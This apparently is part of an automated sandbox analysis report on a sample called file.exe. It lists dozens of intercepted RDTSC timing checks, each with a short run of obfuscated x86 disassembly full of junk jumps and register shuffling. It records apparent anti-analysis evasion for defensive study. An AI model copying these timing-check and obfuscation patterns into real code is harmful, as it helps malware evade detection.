Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56801D1 second address: 5680284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F08ED2F2E90h 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 jmp 00007F08ED2F2E90h 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e jmp 00007F08ED2F2E93h 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 pushad 0x00000027 mov esi, ebx 0x00000029 call 00007F08ED2F2E91h 0x0000002e pop ecx 0x0000002f popad 0x00000030 push edx 0x00000031 jmp 00007F08ED2F2E8Ch 0x00000036 pop ecx 0x00000037 popad 0x00000038 xchg eax, edi 0x00000039 jmp 00007F08ED2F2E91h 0x0000003e test esi, esi 0x00000040 pushad 0x00000041 mov edx, esi 0x00000043 mov ah, 7Ah 0x00000045 popad 0x00000046 je 00007F095F021230h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F08ED2F2E8Ch 0x00000054 mov di, si 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680284 second address: 5680292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680292 second address: 5680346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F08ED2F2E8Dh 0x00000016 or al, 00000026h 0x00000019 jmp 00007F08ED2F2E91h 0x0000001e popfd 0x0000001f mov edx, esi 0x00000021 popad 0x00000022 je 00007F095F0211E9h 0x00000028 pushad 0x00000029 mov ecx, edx 0x0000002b popad 0x0000002c mov edx, dword ptr [esi+44h] 0x0000002f jmp 00007F08ED2F2E91h 0x00000034 or edx, dword ptr [ebp+0Ch] 0x00000037 pushad 0x00000038 mov edx, eax 0x0000003a popad 0x0000003b test edx, 61000000h 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007F08ED2F2E8Bh 0x00000048 and esi, 15F9F1BEh 0x0000004e jmp 00007F08ED2F2E99h 0x00000053 popfd 0x00000054 mov bl, ch 0x00000056 popad 0x00000057 jne 00007F095F0211EBh 0x0000005d jmp 00007F08ED2F2E93h 0x00000062 test byte ptr [esi+48h], 00000001h 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680346 second address: 5680361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680361 second address: 5680379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670751 second address: 5670755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670755 second address: 567075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567075B second address: 56707BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F08ED2385EEh 0x00000015 or esi, 74CA1CE8h 0x0000001b jmp 00007F08ED2385EBh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 pushad 0x00000027 mov ecx, edi 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c jmp 00007F08ED2385EAh 0x00000031 and esp, FFFFFFF8h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F08ED2385F7h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56707BC second address: 56707F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F08ED2F2E8Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, si 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56707F1 second address: 56707F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56707F6 second address: 5670838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 jmp 00007F08ED2F2E8Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F08ED2F2E90h 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F08ED2F2E97h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670838 second address: 5670906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385EFh 0x00000009 and esi, 7702270Eh 0x0000000f jmp 00007F08ED2385F9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F08ED2385F0h 0x0000001b adc esi, 796D0D88h 0x00000021 jmp 00007F08ED2385EBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a push eax 0x0000002b pushad 0x0000002c jmp 00007F08ED2385EFh 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 jmp 00007F08ED2385F2h 0x00000038 mov esi, dword ptr [ebp+08h] 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F08ED2385EEh 0x00000042 sbb ecx, 7D2F8248h 0x00000048 jmp 00007F08ED2385EBh 0x0000004d popfd 0x0000004e push eax 0x0000004f push edx 0x00000050 pushfd 0x00000051 jmp 00007F08ED2385F6h 0x00000056 and eax, 3039C4A8h 0x0000005c jmp 00007F08ED2385EBh 0x00000061 popfd 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670906 second address: 5670984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a sub ebx, ebx 0x0000000c jmp 00007F08ED2F2E91h 0x00000011 test esi, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F08ED2F2E8Ch 0x0000001a add ax, 5968h 0x0000001f jmp 00007F08ED2F2E8Bh 0x00000024 popfd 0x00000025 jmp 00007F08ED2F2E98h 0x0000002a popad 0x0000002b je 00007F095F0288A4h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F08ED2F2E8Ah 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670984 second address: 5670988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670988 second address: 567098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567098E second address: 567099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567099F second address: 5670A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 pushad 0x00000013 mov bl, cl 0x00000015 call 00007F08ED2F2E99h 0x0000001a mov edi, esi 0x0000001c pop esi 0x0000001d popad 0x0000001e mov ecx, esi 0x00000020 jmp 00007F08ED2F2E93h 0x00000025 je 00007F095F028837h 0x0000002b jmp 00007F08ED2F2E96h 0x00000030 test byte ptr [77436968h], 00000002h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F08ED2F2E97h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670A2E second address: 5670A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F095EF6DF51h 0x0000000f pushad 0x00000010 call 00007F08ED2385ECh 0x00000015 movzx eax, bx 0x00000018 pop ebx 0x00000019 mov cx, 2D23h 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F08ED2385F5h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670A81 second address: 5670ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F08ED2F2E8Eh 0x0000000f push eax 0x00000010 jmp 00007F08ED2F2E8Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov eax, edi 0x0000001b mov dx, B6C2h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670ABC second address: 5670B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushfd 0x00000006 jmp 00007F08ED2385F2h 0x0000000b adc esi, 65048458h 0x00000011 jmp 00007F08ED2385EBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F08ED2385F6h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F08ED2385F8h 0x0000002a xor si, 4918h 0x0000002f jmp 00007F08ED2385EBh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670B2F second address: 5670B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670B35 second address: 5670B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670B39 second address: 5670B54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 6E06F442h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5670B54 second address: 5670B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680C9C second address: 5680CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680CB9 second address: 5680CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov eax, 4C205759h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57006B9 second address: 57006BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57006BD second address: 57006CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57006CC second address: 57006F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57006F0 second address: 57006F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57006F4 second address: 5700707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700707 second address: 5700789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385EFh 0x00000009 or ecx, 7D3FBC6Eh 0x0000000f jmp 00007F08ED2385F9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F08ED2385F0h 0x0000001b add cx, A7E8h 0x00000020 jmp 00007F08ED2385EBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a jmp 00007F08ED2385F9h 0x0000002f xchg eax, ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F08ED2385EDh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0A37 second address: 56F0A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0A3D second address: 56F0A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0A41 second address: 56F0A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0A45 second address: 56F0A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F08ED2385F9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0A69 second address: 56F0A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0A6F second address: 56F0A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0A7F second address: 56F0A8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690008 second address: 569000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569000C second address: 569001E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569001E second address: 5690096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d pushfd 0x0000000e jmp 00007F08ED2385F0h 0x00000013 xor cl, FFFFFFC8h 0x00000016 jmp 00007F08ED2385EBh 0x0000001b popfd 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F08ED2385F9h 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F08ED2385EEh 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F08ED2385F7h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690096 second address: 56900C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b jmp 00007F08ED2F2E8Ch 0x00000010 pushad 0x00000011 mov ecx, 686C76D7h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0C7B second address: 56F0CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2385EDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0CA5 second address: 56F0D14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F08ED2F2E93h 0x00000015 add ah, 0000005Eh 0x00000018 jmp 00007F08ED2F2E99h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F08ED2F2E90h 0x00000024 and si, 1158h 0x00000029 jmp 00007F08ED2F2E8Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0D14 second address: 56F0D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, B47Ah 0x00000007 pushfd 0x00000008 jmp 00007F08ED2385EBh 0x0000000d xor ecx, 5E47301Eh 0x00000013 jmp 00007F08ED2385F9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push dword ptr [ebp+08h] 0x0000001f jmp 00007F08ED2385EEh 0x00000024 call 00007F08ED2385E9h 0x00000029 jmp 00007F08ED2385F0h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 call 00007F08ED2385ECh 0x00000037 pop eax 0x00000038 mov ebx, 6279B7B6h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0D8B second address: 56F0DB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov ecx, 6C6FC745h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F08ED2F2E8Bh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bl, al 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0DB0 second address: 56F0DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0DFF second address: 56F0E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0E03 second address: 56F0E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0514 second address: 56A0535 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 1EB4h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 015F7220h 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F08ED2F2E8Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0535 second address: 56A0539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0539 second address: 56A053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A053F second address: 56A0545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0545 second address: 56A0549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0549 second address: 56A05C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov esi, 20FEB3F1h 0x00000011 mov al, 9Eh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F08ED2385F9h 0x0000001b push FFFFFFFEh 0x0000001d pushad 0x0000001e mov cl, FCh 0x00000020 pushfd 0x00000021 jmp 00007F08ED2385F9h 0x00000026 adc ah, FFFFFF96h 0x00000029 jmp 00007F08ED2385F1h 0x0000002e popfd 0x0000002f popad 0x00000030 call 00007F08ED2385E9h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F08ED2385EDh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A05C5 second address: 56A05E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2F2E8Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A05E9 second address: 56A05EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A05EF second address: 56A068D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F08ED2F2E98h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F08ED2F2E8Bh 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d mov esi, ebx 0x0000001f push edi 0x00000020 pushad 0x00000021 popad 0x00000022 pop esi 0x00000023 popad 0x00000024 pop eax 0x00000025 pushad 0x00000026 jmp 00007F08ED2F2E99h 0x0000002b movzx eax, dx 0x0000002e popad 0x0000002f push 2670FCAEh 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F08ED2F2E96h 0x0000003b sbb ch, 00000068h 0x0000003e jmp 00007F08ED2F2E8Bh 0x00000043 popfd 0x00000044 mov bx, cx 0x00000047 popad 0x00000048 add dword ptr [esp], 50C7B152h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 mov ecx, edi 0x00000054 mov ebx, 64B39AAEh 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A068D second address: 56A06C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385F1h 0x00000009 sbb cl, 00000036h 0x0000000c jmp 00007F08ED2385F1h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr fs:[00000000h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A06C6 second address: 56A06CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A06CA second address: 56A06D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A06D0 second address: 56A0712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e mov ecx, ebx 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F08ED2F2E94h 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F08ED2F2E8Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0712 second address: 56A0716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0716 second address: 56A071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A071C second address: 56A0722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0722 second address: 56A0726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0726 second address: 56A073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2385EBh 0x00000012 rdtsc
